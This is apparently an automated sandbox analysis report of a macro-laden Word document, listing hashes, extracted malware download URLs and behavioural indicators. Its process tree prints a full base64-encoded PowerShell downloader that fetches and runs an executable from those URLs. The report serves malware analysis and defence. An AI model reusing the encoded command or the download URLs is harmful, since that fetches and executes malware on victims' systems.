Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
29/08/2024, 08:37
Static task
static1
Behavioral task
behavioral1
Sample
c87e3f97b6aecc12ff6e21fdb7ac50c3_JaffaCakes118.doc
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
c87e3f97b6aecc12ff6e21fdb7ac50c3_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
c87e3f97b6aecc12ff6e21fdb7ac50c3_JaffaCakes118.doc
-
Size
176KB
-
MD5
c87e3f97b6aecc12ff6e21fdb7ac50c3
-
SHA1
54071f56f6500c7a88b0ab7a37ee9cfd11756d84
-
SHA256
7e6fc690af5421734b9e41997457b99056bf254674b8fc8d3d60b3c5abd27128
-
SHA512
6c7fdae4515629954faedc6d6be66cb68cb8d0f886a37f679737dd906fbe23c65951e910731d326a0178257b19520eea92df267bd50202b9cb050136aa5a92c0
-
SSDEEP
1536:q5M8Na9quLeJ1b5VahG/A8k/gvjl0NZqDlGffQanLzdf7RqcYO4OvqTl1ygpdavD:SUqJ1NgsA8k/gvh0NZ0lGX1nZ7RRYq
Malware Config
Extracted
http://famousdiagnosticcenter.com/wp-admin/7wX/
http://www.govtcollegesihunta.com/wp-includes/hX/
http://jegsnet.com/wp-content/lPr/
http://fenekformalas.newquantumlogic.com/webstat/G/
http://helixity-india.com/wp-content/M/
https://www.buntebenelux.com/wp-admin/cbW/
http://swso2.com/wp-admin/a/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2956 2756 POwersheLL.exe 30 -
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2956 POwersheLL.exe 7 2956 POwersheLL.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POwersheLL.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\Interface WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2088 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2956 POwersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2956 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2088 WINWORD.EXE 2088 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2088 wrote to memory of 2548 2088 WINWORD.EXE 35 PID 2088 wrote to memory of 2548 2088 WINWORD.EXE 35 PID 2088 wrote to memory of 2548 2088 WINWORD.EXE 35 PID 2088 wrote to memory of 2548 2088 WINWORD.EXE 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c87e3f97b6aecc12ff6e21fdb7ac50c3_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD JABWAHAAbAA1AHQANQAyAD0AKAAoACcARQAnACsAJwA5AGcAdAAnACkAKwAnAGQAJwArACcAbQB1ACcAKQA7ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUATgBWADoAVQBTAGUAUgBwAFIAbwBmAEkATABlAFwASABjAHoAZgAyAHYAbgBcAGEAbQAwAGgAMgB3AGQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAFIAZQBDAHQATwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAHUAUgBJAFQAYABZAFAAYABSAG8AVABvAGAAQwBgAG8ATAAiACAAPQAgACgAJwB0AGwAJwArACgAJwBzACcAKwAnADEAMgAsACAAdABsACcAKQArACgAJwBzADEAJwArACcAMQAsACcAKQArACcAIAB0ACcAKwAnAGwAcwAnACkAOwAkAFcAawA4AGcAZgBoAF8AIAA9ACAAKAAnAEEAJwArACcAYQAnACsAKAAnADgANQB4ACcAKwAnAHEAJwArACcAaQA0ACcAKQApADsAJABPAG4AaQBoADcAagBpAD0AKAAoACcAUgAnACsAJwBtADIANwAnACkAKwAoACcAZgB6ACcAKwAnAHEAJwApACkAOwAkAEsANABpAG8AdgBmAGMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACgAJwBpACcAKwAnADQAZwBIAGMAJwApACsAKAAnAHoAZgAyACcAKwAnAHYAJwApACsAJwBuAGkAJwArACgAJwA0AGcAQQAnACsAJwBtADAAaAAyACcAKQArACgAJwB3AGQAJwArACcAaQA0ACcAKQArACcAZwAnACkAIAAgAC0AQwBSAEUAUABMAGEAYwBFACgAJwBpADQAJwArACcAZwAnACkALABbAGMAaABBAHIAXQA5ADIAKQArACQAVwBrADgAZwBmAGgAXwArACgAJwAuACcAKwAoACcAZQB4ACcAKwAnAGUAJwApACkAOwAkAFIAMAA0AHAANgB1AHoAPQAoACgAJwBIACcAKwAnAGgAMQAnACkAKwAoACcAMQBrAHYAJwArACcAbwAnACkAKQA7ACQATwBxAG8AegB3ADIAaQA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBlAHQALgBXAGUAQgBjAGwASQBFAE4AVAA7ACQARABrADgAYQA0AGEAdAA9ACgAJwBoACcAKwAnAHQAJwArACcAdABwACcAKwAoACcAOgAvACcAKwAnAC8AZgBhAG0AJwApACsAKAAnAG8AJwArACcAdQBzACcAKQArACcAZAAnACsAKAAnAGkAYQAnACsAJwBnAG4AJwApACsAKAAnAG8AcwB0AGkAJwArACcAYwBjAGUAbgB0ACcAKwAnAGUAcgAuAGMAbwAnACkAKwAnAG0ALwAnACsAJwB3AHAAJwArACgAJwAtAGEAZAAnACsAJwBtACcAKQArACgAJwBpAG4ALwAnACsAJwA3ACcAKQArACcAdwBYACcAKwAoACcALwAqAGgAdAAnACsAJwB0ACcAKQArACgAJwBwACcAKwAnADoALwAnACkAKwAoACcALwAnACsAJwB3AHcAJwArACcAdwAuAGcAJwApACsAJwBvACcAKwAoACcAdgB0ACcAKwAnAGMAbwBsACcAKwAnAGwAJwApACsAJwBlAGcAJwArACcAZQBzACcAKwAoACcAaQBoAHUAJwArACcAbgB0ACcAKwAnAGEAJwArACcALgAnACsAJwBjAG8AbQAvAHcAcAAtACcAKQArACgAJwBpAG4AYwAnACsAJwBsACcAKQArACgAJwB1AGQAZQBzAC8AaAAnACsAJwBYAC8AJwArACcAKgBoACcAKQArACgAJwB0AHQAJwArACcAcAAnACkAKwAnADoALwAnACsAKAAnAC8AagBlACcAKwAnAGcAJwApACsAKAAnAHMAbgAnACsAJwBlAHQALgBjACcAKwAnAG8AbQAvAHcAJwApACsAJwBwACcAKwAnAC0AJwArACcAYwBvACcAKwAoACcAbgB0AGUAbgB0AC8AbAAnACsAJwBQACcAKQArACcAcgAvACcAKwAoACcAKgAnACsAJwBoAHQAJwApACsAJwB0AHAAJwArACcAOgAnACsAJwAvAC8AJwArACgAJwBmAGUAbgBlAGsAJwArACcAZgBvACcAKwAnAHIAJwApACsAJwBtAGEAJwArACcAbAAnACsAKAAnAGEAcwAnACsAJwAuAG4AZQAnACkAKwAnAHcAJwArACcAcQB1ACcAKwAnAGEAJwArACgAJwBuAHQAJwArACcAdQBtACcAKwAnAGwAbwAnACkAKwAnAGcAaQAnACsAJwBjACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvACcAKQArACcAdwBlACcAKwAnAGIAJwArACgAJwBzACcAKwAnAHQAYQB0ACcAKQArACgAJwAvAEcAJwArACcALwAnACkAKwAoACcAKgBoAHQAdAAnACsAJwBwADoALwAnACkAKwAnAC8AaAAnACsAKAAnAGUAbABpACcAKwAnAHgAJwArACcAaQB0AHkALQAnACsAJwBpACcAKQArACcAbgAnACsAJwBkACcAKwAnAGkAYQAnACsAJwAuAGMAJwArACcAbwBtACcAKwAoACcALwAnACsAJwB3AHAAJwApACsAJwAtAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACkAKwAoACcATQAvACcAKwAnACoAaAB0AHQAcAAnACkAKwAoACcAcwAnACsAJwA6AC8ALwB3AHcAdwAnACsAJwAuACcAKQArACcAYgB1ACcAKwAnAG4AJwArACgAJwB0AGUAYgAnACsAJwBlAG4AJwArACcAZQAnACkAKwAoACcAbAB1ACcAKwAnAHgALgAnACsAJwBjAG8AJwApACsAJwBtACcAKwAoACcALwAnACsAJwB3AHAALQBhAGQAJwArACcAbQBpAG4ALwAnACkAKwAoACcAYwBiACcAKwAnAFcALwAnACkAKwAoACcAKgBoACcAKwAnAHQAdABwACcAKQArACgAJwA6AC8AJwArACcALwBzACcAKQArACgAJwB3AHMAJwArACcAbwAyAC4AJwApACsAKAAnAGMAbwBtAC8AJwArACcAdwAnACsAJwBwAC0AYQBkACcAKQArACgAJwBtAGkAbgAvACcAKwAnAGEALwAnACkAKQAuACIAUwBwAEwAYABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABNAHAAXwByAHMANABsAD0AKAAnAFkAbQAnACsAJwBwAF8AJwArACgAJwA1ACcAKwAnADMANgAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFYAXwBpAGgANwBsAHcAIABpAG4AIAAkAEQAawA4AGEANABhAHQAKQB7AHQAcgB5AHsAJABPAHEAbwB6AHcAMgBpAC4AIgBkAE8AdwBgAE4ATABPAEEAZABGAGAAaQBMAEUAIgAoACQAVgBfAGkAaAA3AGwAdwAsACAAJABLADQAaQBvAHYAZgBjACkAOwAkAEwAcwA5AHIAcABvAHYAPQAoACcAUgBxACcAKwAnADgAegAnACsAKAAnAHUAJwArACcAdAA4ACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEsANABpAG8AdgBmAGMAKQAuACIATABlAGAATgBnAFQASAAiACAALQBnAGUAIAAyADEANwA3ADcAKQAgAHsAJgAoACcASQAnACsAJwBuAHYAJwArACcAbwBrAGUAJwArACcALQBJAHQAZQBtACcAKQAoACQASwA0AGkAbwB2AGYAYwApADsAJABPAG8AMgAxAF8ANQA3AD0AKAAoACcARAAnACsAJwByAHMAZgB6ACcAKQArACcAMAB0ACcAKQA7AGIAcgBlAGEAawA7ACQASgBqADQAeQA4ADMAZAA9ACgAKAAnAEEAJwArACcANABjADgAJwApACsAJwB4AGYAJwArACcAcAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEkAYgBrAG4AZAB4AHEAPQAoACcAQgAnACsAKAAnADUAawA5ACcAKwAnAGQANQAnACkAKwAnAF8AJwApAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2956
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD517d7a6192d1c83d14255858e7d08edea
SHA18a675395e355952ca39a3283ea21ae5eda80316a
SHA25661f0a6f7eac54ad54b43a06cb0fb4ca9b58148ba5d2b170ba99db3cf621c2cde
SHA512b1a7e0ca78bad4be63961520317572cb090d9ed6adfe7fc1a652775131d5ea1c58cbfcee15a4a4b7adea116d3248bd4cc9c723451610c2a510d94f64bada008b